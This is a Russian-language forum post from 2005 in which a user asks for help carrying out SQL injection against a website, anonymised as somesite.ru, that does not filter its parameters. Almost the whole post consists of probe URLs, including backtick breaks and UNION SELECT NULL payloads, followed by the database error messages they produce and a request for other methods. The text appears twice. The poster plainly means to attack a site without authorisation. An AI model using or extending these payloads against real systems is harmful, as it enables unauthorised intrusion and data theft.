zodchiy
26.07.2005, 12:21
блин, прям незнаю что делать, я уже сдесь писал, но подумал может я мало описал проблему.... значит так, попытка два:
видно что сайт не фильтрует входящие параметры...
somesite.ru/idpage_6/do_1/idn_328.htm - общий вид
somesite.ru/idpage_6/do_1/idn_328.ht - порождает ошибку
somesite.ru/idpage_6/do_1/idn_328.htm` - порождает ошибку
somesite.ru/idpage_6/do_1/idn_ - порождает ошибку
somesite.ru/idpage_6/do_1/idn_328` - порождает ошибку
ошибка одна и таже:
Query error
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /common/www/html/somesite/ind_6.php on line 275 (номер строки меняется)
somesite.ru/idpage_6/do_1/idn_328.htm+union+select+null[null,null...]/*
somesite.ru/idpage_6/do_1/idn_328.htm`+union+select+null[null,null...]/*
somesite.ru/idpage_6/do_1/idn_328+union+select+null[null,null...]/*
somesite.ru/idpage_6/do_1/idn_328`+union+select+null[null,null...]/*
(а также, все тоже, но вместо "+" - "%20")
все эти запросы также порождают одну и ту же ошибку... никаких тебе "дифферент колумс" и т.п.
есть ли другие способы?
видно что сайт не фильтрует входящие параметры...
somesite.ru/idpage_6/do_1/idn_328.htm - общий вид
somesite.ru/idpage_6/do_1/idn_328.ht - порождает ошибку
somesite.ru/idpage_6/do_1/idn_328.htm` - порождает ошибку
somesite.ru/idpage_6/do_1/idn_ - порождает ошибку
somesite.ru/idpage_6/do_1/idn_328` - порождает ошибку
ошибка одна и таже:
Query error
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /common/www/html/somesite/ind_6.php on line 275 (номер строки меняется)
somesite.ru/idpage_6/do_1/idn_328.htm+union+select+null[null,null...]/*
somesite.ru/idpage_6/do_1/idn_328.htm`+union+select+null[null,null...]/*
somesite.ru/idpage_6/do_1/idn_328+union+select+null[null,null...]/*
somesite.ru/idpage_6/do_1/idn_328`+union+select+null[null,null...]/*
(а также, все тоже, но вместо "+" - "%20")
все эти запросы также порождают одну и ту же ошибку... никаких тебе "дифферент колумс" и т.п.
есть ли другие способы?